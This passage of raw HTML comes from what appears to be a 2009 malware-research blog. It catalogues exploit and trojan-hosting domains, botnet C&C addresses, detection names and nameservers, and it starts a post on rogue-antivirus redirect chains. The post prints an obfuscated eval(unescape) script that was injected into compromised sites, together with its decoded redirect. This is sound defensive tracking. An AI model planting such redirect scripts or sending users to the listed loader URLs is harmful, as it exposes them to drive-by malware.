/>hxxp://zzz.free.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank">Anubis</a><br />Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />It connect to a URL and drop the file "digiwet.dll"<br />Botnets C&C: <br />turokgame.cn [74.50.98.156]<br />94.247.2.95 and 78.109.30.224<br /></td> </tr><tr> <td height="26"><span class="trojan">hxxp://freewebhostguide.com</span></td> <td><a href="http://safeweb.norton.com/report/show?name=freewebhostguide.com" target="_blank">Symantec</a><a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&t=1239052811&type=js" target="_blank"></a></td></tr><tr> <td><span class="trojan">hxxp://greatbethere.cn</span></td> <td>Load trojan on<br />hxxp://greatbethere.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/893c4ed46d09f4d1c43ae40fbdef2bf8">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=666f614786902fd2352c0039e9dd2d04&t=1238102754&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e76a4475454c09940d2671f4c52d7293" target="_blank">Anubis</a><br />Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />Using a stack overflow in adobe reader 8.1.1 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a> <br /><br />It connect to a URL and drop the file "digiwet.dll"<br />Botnets C&C: <br />213.155.6.32<br />78.109.30.224<br /></td></tr><tr> <td height="26">hxxp://hugetopnonfat.cn</td> <td>dead</td></tr><tr> <td height="83"><span class="trojan">hxxp://mediahomenamemartvideo.cn/<br />in.cgi?income</span></td> <td>Botnet C&C / redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=dbf20d61a135033ff904d1e4aa193469&t=1239238663&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td></tr><tr> <td height="131">hxxp://hyperliteautoservices.cn</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/8327265e423bd2c7e19456119d389691">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=18be328f7652759e471e87bf6afa41cf8" target="_blank">Anubis<br /></a> Flash exploit is also live:<br />
<br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a><br />Botnet C&C: 78.109.29.112 <br /></td> </tr><tr> <td height="20">hxxp://lieliteautobody.cn (dead)</td> <td> </td></tr><tr> <td height="36"><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span><br /></td> </tr><tr><td height="117">hxxp://liteautogreatest.cn</td><td>Exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load trojan on<br /> hxxp://liteautogreatest.cn/load.php<br /> <a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=88dbec3ba9da0df0a5f94806ec303516&t=1239816944&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis<br /> <br /> </a> Flash exploit is also live:<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a> - <a href="http://www.virustotal.com/analisis/d53523199a75b38f03300473508594d8" target="_blank">VirusTotal</a><br /> <br /> Botnet C&C: 78.109.29.112</td></tr>
<tr> <td height="117"><span class="trojans_luckysploit">hxxp://liteautorepair.cn</span></td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/37d49709ee09ba69072ce158ec0a4ddb">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=f4bec9780ebb9269d46becfb0557e391&t=1238886038&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1fff28d7a01d6b344ed7184ef3ca0537f" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet controller: 213.155.4.82 </td></tr><tr> <td height="119">hxxp://litedownloadfinest.cn</td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/4b25552e0659179a22fec8cc6208ad57">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=233e11cebbf860a6b689cd27b0a0cd92&t=1239013312&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=158efd3418e4e7c8495803043e3960cb9&format=html" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.B<br /><br />Previous botnet controller: 78.109.29.112</td> </tr><tr> <td height="148"><span class="trojans_luckysploit">hxxp://litehitscar.cn/index.php</span></td> <td>Exploit to load trojan on <br />hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan.Botnetlog.3<br /><br />Botnets: <br />78.109.29.112 - 78.109.30.224<br />74.54.77.82</td> </tr><tr> <td height="37"><span class="trojans_luckysploit">hxxp://lieliteautobody.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">lieliteautobody.cn/load.php</span><br /></td> </tr><tr> <td height="38">hxxp://liteautofinestsite.cn/load.php</td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">liteautofinestsite.cn/load.php</span><br /></td> </tr>
<tr><td height="148"><span class="trojans_luckysploit">hxxp://liteupyourride.cn/</span></td><td>Exploits<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/readme.pdf<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/flash.swf <br /> to load trojan on<br /> hxxp://<span class="trojans_luckysploit">litehitscar.cn</span>/load.php<br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1f36ed14afffc55d4718874ebbc2924cf&call=first" target="_blank">Anubis<br /><br /></a> PDF exploit is also live:<br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=4925255f3716377f7fcb7c9bfb038795&t=1240163655&type=js" target="_blank">PDF Analysis</a> - <a href="http://www.virustotal.com/analisis/46adc25de221146ea1a2458c97602518" target="_blank">VirusTotal</a><br /><br /> Botnet C&C: 78.109.29.112</td></tr>
<tr> <td>hxxp://yournonfatbest.cn</td> <td>Exploit to load trojan on <br />farm-en-12san.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/cc3417a8cbf0389ad12163327c8732df">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=e89d7bf9986d2d0c646386ce37a66711&t=1238583254&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=15848c72b1c5577b4ed8e07e237c0788c" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.G<br /><br />Botnets: <br />213.155.4.82<br />78.109.30.224</td> </tr><tr> <td>hxxp://lotbetsite.cn</td> <td>Exploit to load trojan on <br />casinoslotbet.cn/load.php - <a href="http://wepawet.iseclab.org/view.php?hash=1c3cfb439f08852425dbc8040ecb520a&t=1238733983&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=120feec140b719c44296a36691cde80bf&format=html" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet: <br />213.155.6.33<br /></td></tr><tr> <td> </td> <td> </td></tr><tr> <td>hxxp://hugetopnonfat.cn/in.cgi?id1000</td> <td><a href="http://jsunpack.jeek.org/dec/go?url=hugetopnonfat.cn_in.cgi_id1000" target="_blank">Javascript Analysis</a></td></tr><tr> <td>hxxp://PremiumNonfat.cn/all/<br />
</td> <td>dead</td></tr></table><hr /><br /> 94.247.3.150 [hs.3-150.zlkon.lv]<br /><br /><table width="544" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC">
<tr><td height="37">hxxp://autobestwestern.cn/<br />cache/readme.pdf</td><td>Exploit to load trojan on <br />litehitscar.cn/load.php?id=5 - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=8233c2b3088873d86d042ce79289e44d&t=1240167118&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1cc774803b2c2ab249d677b9f5a678ead" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.Q<br /><br />Botnet: <br />78.109.29.112<br /></td></tr><tr><td>hxxp://coolnameshop.cn/in.cgi?income</td><td> </td></tr><tr> <td>hxxp://cutlot.cn/in.cgi?income</td> <td>Botnet C&C / Exploits to <br /> hxxp:// liteautogreatest.cn/index.php<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=20142646ae8f7bfe737f067a3b9727b4&t=1240007105&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hxxp://litehitscar.cn/load.php?id=5<br /> <a href="http://www.virustotal.com/analisis/ad5c23d5a7c497bb790eef37979113d5" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1d42a8cbbf551c5a4e9de58e48e6eb20f" target="_blank">Anubis</a><br /> <br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /> </a></td></tr><tr><td width="218">hxxp://dotcomnameshop.cn</td><td width="320">Botnet C&C</td></tr><tr><td>hxxp://lotante.cn</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://lotbetworld.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.iseclab.org/view.php?hash=b9af869590a473fc6ba9f5ca8d498872&t=1239080318&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="101">hxxp://homenameregistration.cn</td><td>Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5<br /> <a href="http://wepawet.iseclab.org/view.php?hash=98f5276a9ceaaceab5f02eaba5fb201f&t=1237346408&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> 78.41.207.196<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958">Analysis</a><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://hugetopnonfat.cn</td><td>Botnet C&C</td></tr><tr><td>hxxp://dotcomnameshop.cn/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits <br />hxxp://litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br />hxxp://hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://japanhostnet.com/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="40">hxxp://internetnamestore.cn/<br />in.cgi?income18</td><td>hyperliteautoservices.cn/index.php [94.247.3.151] <a href="http://anubis.iseclab.org/?action=result&task_id=1fdf218137076cf6465f76e3f183c3174&format=html" target="_blank">Analysis</a></td></tr><tr><td height="40">hxxp://lotmachinesguide.cn/<br />in.cgi?income</td><td>Redirects to exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load trojan on<br /> hxxp://liteautogreatest.cn/load.php<br /><a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=40131580bd98592c013be3d33aa926b1&t=1239959058&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis<br /><br /></a>Botnet C&C: 78.109.29.112</td></tr><tr><td>hxxp://mainnameshop.cn</td><td>Redirect to exploits sdfi.hostindianet.com/index.php (dead)<br /> <br /> Detection: Win32/Bredolab.B<a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://mediahomenamemartvideo.cn</td><td>Botnet C&C down (TS v3.2)</td></tr><tr><td>hxxp://mediahousenameshopfilm.cn</td><td> </td></tr><tr><td height="192">hxxp://nameashop.cn/in.cgi?income</td><td>On 2009-03-21 01:40:07 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1237624807&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br />hxxp://sadcwed.hostindianet.com/index.php<br /> On 2009-04-05 13:22:58 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1238962978&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br /> freeonlinehostguide.com/index.php <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a> - <a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe" target="_blank">VirusTotal </a>- <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank">Anubis</a><br /> Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen<br /> It connect to a botnet and drop the file "digiwet.dll"<br /> Botnets: <br /> turokgame.cn [74.50.98.156]<br /> 94.247.2.95 and 78.109.30.224<br /></td></tr><tr><td height="23">hxxp://namebrandmart.cn/in.cgi<br />?income18</td><td>litehitscar.cn/load.php <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namebuyline.cn</td><td> <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="76">hxxp://namebuypicture.cn/<br />in.cgi?income31</td><td>Botnet C&C / redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=a4d97828eb9521d905394f4a6d7516df&t=1239246607&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namesupermart.cn</td><td>Botnet C&C</td></tr><tr><td height="79">hxxp://namestorefilmlife.cn/<br /> in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis<br /> </a></td></tr><tr><td height="93">hxxp://perfectnamestore.cn<br /> /in.cgi?income8</td><td>Redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> [94.247.3.151]</td></tr><tr><td>hxxp://playbetwager.cn/in.cgi?income</td><td><br /> freeonlinehostguide.com/index.php</td></tr><tr><td>hxxp://superbetfair.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=9bad5a6b522a3a1a37b6a62572a83767&t=1239297891&type=js" target="_blank">Redirection Analysis</a><br />Detection: Trojan.Botnetlog.3 <br /></td></tr><tr><td>hxxp://thelotbet.cn</td><td> </td></tr><tr><td>hxxp://yourfilmmovie.cn</td><td>Botnet C&C</td></tr></table><br /><br />hxxpp//freeonlinehostguide.com/index.php <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a><hr /><p>Dns<br /><br />AS48856<br />VENTREX-AS Ventrex LLP</p><p>95.129.144.210</p><p>freednshostway.com<br />ns1.bigtopescorts.cn<br />ns1.casinobigtop.cn<br />ns1.casinoslotbet.cn<br />ns1.cheapslotplay.cn<br />ns1.daddybigtop.cn<br />ns1.educationbigtop.cn<br />ns1.freednshostway.com<br />ns1.freehostinternet.com<br />ns1.freeonlinehostguide.com<br />ns1.freewebhostguide.com<br />ns1.greatbethere.cn<br />ns1.hostindianet.com<br />ns1.hyperliteautoservices.cn<br />ns1.lieliteautobody.cn<br />ns1.liteautofinestsite.cn<br />ns1.liteautorepair.cn<br />ns1.litehitscar.cn<br />ns1.lotante.cn<br />ns1.lotbetsite.cn<br />ns1.playbetwager.cn</p><p>AS34187<br />RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine</p><p>78.26.179.79</p><p>ns2.bigtopescorts.cn<br />ns2.casinobigtop.cn<br />ns2.casinoslotbet.cn<br />ns2.cheapslotplay.cn<br />ns2.daddybigtop.cn<br />ns2.educationbigtop.cn<br />ns2.freednshostway.com<br />ns2.freehostinternet.com<br />ns2.freeonlinehostguide.com <br />ns2.freewebhostguide.com<br />ns2.greatbethere.cn<br />ns2.hostindianet.com <br />ns2.hyperliteautoservices.cn<br />ns2.lieliteautobody.cn<br />ns2.liteautofinestsite.cn <br />ns2.liteautorepair.cn<br />ns2.litehitscar.cn <br />ns2.lotante.cn <br />ns2.lotbetsite.cn<br />ns2.playbetwager.cn<br /><br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-17945510995376722442009-04-07T06:19:00.000-07:002009-04-09T14:31:07.836-07:00Black Hat SEO and Rogue Antivirus p.7<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Rogue Antivirus is BIG Business</span><br /><br /> Inside the malicious traffic<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> The Finjan's Malicious Code Research Center has made a nice report <br /> about the business with rogue antivirus software <br />(redirecting visitors from legitimate Web sites). <a href="http://news.cnet.com/8301-1009_3-10200104-83.html" target="_blank">Zdnet Article</a><br /><br />The article can be found in the latest <a href="http://www.finjan.com/cybercrime_intelligence" target="_blank">Cybercrime Intelligence Report</a><br /><hr />I just want to show you some script added on legit websites and the log <br />we've found on the criminal web server.<br /><br />Note that for each site on this blog like goscanfuse.com, scan6lite.com, <br />scan7new.com, every domain is listed in the Google API "Safe Browsing" <br />and each of them reveal a lot of information. <br /> eg. the number on domain used (compromised) and other in conjunctions.<br /><br /><hr /><br />We start by a Google Safe Browsing Diagnostic for: scanline6.com<br /><br /><a href="http://www.google.com/safebrowsing/diagnostic?site=http://scanline6.com/nag/1/&hl=en" target="_blank">Report here</a><br /><br /> Screenshot below (if the report is updated)<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGSs8mKUf4KusGfKv0Y4DKZUH938u9SypcbiwjaivINPVX8mu-k7SBFJtiQ06soez_Wp6lNSnq7xUUL2y2d7uLGdL16HshBXBODKjESWeZ-zKC8zkn-LmAunyuCVgIaNj0ii16bJVKoGon/s1600-h/AS21788NOC.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGSs8mKUf4KusGfKv0Y4DKZUH938u9SypcbiwjaivINPVX8mu-k7SBFJtiQ06soez_Wp6lNSnq7xUUL2y2d7uLGdL16HshBXBODKjESWeZ-zKC8zkn-LmAunyuCVgIaNj0ii16bJVKoGon/s320/AS21788NOC.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938534381381138" /></a><br /><br /> Now the Google Safe Browsing Diagnostic for three compromised websites<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCBW3KC2zyn33C5AbWIfEd9YhLIV_DgHdYykTPIQQHNsb2OQ34UOE9lY3mkHgwLfwWb7R_5_EfWsVSL0Ytv4ibZGKdIPSTPeFUXdlVswplTB1b0MCO_d33ozytxqYc3FyknWsVJ1j3EraL/s1600-h/scanline6.comSafeBrowsing.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 199px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCBW3KC2zyn33C5AbWIfEd9YhLIV_DgHdYykTPIQQHNsb2OQ34UOE9lY3mkHgwLfwWb7R_5_EfWsVSL0Ytv4ibZGKdIPSTPeFUXdlVswplTB1b0MCO_d33ozytxqYc3FyknWsVJ1j3EraL/s320/scanline6.comSafeBrowsing.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938531281580738" /></a><br /><br /><br /></p><table width="280" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="276" height="46" style="padding:15px">alfredomcmillanji.awardspace.info<br /> members.lycos.co.uk/cvhkc8xhv/</td></tr></table><br />Malicious script inserted. (after the body)<br /><br /><table width="511" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="507" height="61" style="padding:15px"><script><br />eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\<br />%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F<br />\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\<br />%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\<br />%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\<br />%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\<br />%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B'))<br /></script></td></tr></table><p>Which force the browser to be redirected to a traffic management server<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="368" height="61" style="padding:15px">document.location="http://onlyfind.net/in.cgi?3&group=11&<br />parameter=orthopedic+physical+examination";</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Result here</a><br /> then redirect to a domain (drive-by-download) which chose the next redirection<br /></p><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">onlyfind.net to "goscandata.com" to "scanany6.com"</td></tr></table><br />Note: the domain (drive-by-download) redirect to a new site every day.<br /> <br />On April 6: scanany6.com - <a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Redirection Analysis</a><br />On April 7: scan7live.com - <a 